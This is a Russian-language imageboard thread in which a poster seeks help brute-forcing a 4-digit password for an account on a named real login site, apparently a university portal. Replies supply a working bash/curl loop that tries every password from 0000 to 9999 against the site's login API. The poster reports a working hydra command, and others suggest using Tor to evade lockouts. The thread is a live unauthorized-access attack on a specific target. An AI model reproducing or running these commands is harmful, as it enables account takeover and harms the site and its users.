[/b/] [/d/] [/tu/] [/a/] [/ph/] [/wa/] [/cg/] [/t/] [/p/]
Господа хакеры, выручайте. Есть один сайт с web-формой логина, пароль ограничен 4 цифра. Логин знаю. Хочу использовать метод брутфорса для взлома аккаунта. Посоветовали Brutus, но он не может с помощью modify sequence найти форму и правильно определить, где на ней поля ввода. Щто мне делать? Сайт http://platonus.kazatu.kz/
for pass in $(seq -w 0 9999); do echo password: $pass; curl -A '' --data-binary '{"login":"$login","iin":null,"password":"'"$pass"'"}' -H 'Content-Type: application/json; charset=UTF-8' -w '\n%{http_code}\n\n' http://platonus.kazatu.kz/rest/api/login; doneВместо $login введи известный логин.
for pass in $(seq -w 0 9999); do echo password: $pass; curl -A '' --data-binary '{"login":"$login","iin":null,"password":"'"$pass"'"}' -H 'Content-Type: application/json; charset=UTF-8' -w '\n%{http_code}\n\n' http://platonus.kazatu.kz/rest/api/login; done
Вместо $login введи известный логин.
Нормальные сайты банят за 5-10 неправильных попыток входа. Или запрещают попытки войти на полчаса-день.
>>159492Можно через tor долбиться, там как раз по узлу на пароль где-то будет.
Ура! Получилось через гидру!hydra -l <логин в url-кодировке> -P <путь к файлу с паролями от 0000 до 9999> platonus.kazatu.kz http-post-form "/rest/api/login:language=1&login=^USER^password=^PASS^:Добро" -vV -fС моими данными для входа работает. Осталось подумать, как сгенерить пароли от 0000 до 9999 для файла. Комбинаторику вспоминать теперь, блин.>>159491Спасибо, конечно, но что это? php? Как запускать?>>159492>>159493Да не, там все через жопу работает, можно об этом не беспокоиться.
Ура! Получилось через гидру!hydra -l <логин в url-кодировке> -P <путь к файлу с паролями от 0000 до 9999> platonus.kazatu.kz http-post-form "/rest/api/login:language=1&login=^USER^password=^PASS^:Добро" -vV -f
С моими данными для входа работает. Осталось подумать, как сгенерить пароли от 0000 до 9999 для файла. Комбинаторику вспоминать теперь, блин.
>>159491Спасибо, конечно, но что это? php? Как запускать?
>>159492>>159493Да не, там все через жопу работает, можно об этом не беспокоиться.
>>159494Это shell обыкновенный.
>>159494> Осталось подумать, как сгенерить пароли от 0000 до 9999 для файла. Комбинаторику вспоминать теперь, блин.Ну ты и script kiddie. seq -w 0 9999 из скрипта выше их и генерирует.
>>159494
> Осталось подумать, как сгенерить пароли от 0000 до 9999 для файла. Комбинаторику вспоминать теперь, блин.
Ну ты и script kiddie. seq -w 0 9999 из скрипта выше их и генерирует.
>>159497Он разве не от 0 до 9999 генерирует? Мне надо, чтобы входили также 0000, 0001, 0002 и т.д.
>>159498Ключ -w включает нужный тебе режим.
>>159499Спасибо!
Странно, пароль нашелся, а через форму не могу зайти.
Как думаете, чому не получается войти с этим паролем?
>>159503Они решили, что просто согласиться будет легче.
>>159491Как сюда добавить условие, чтоб скрипт выполнялся, только пока на консоль выводится {"message":"Problem matching username and password","login_status":"invalid"} 401?
- wakaba 3.0.7 + futaba + futallaby -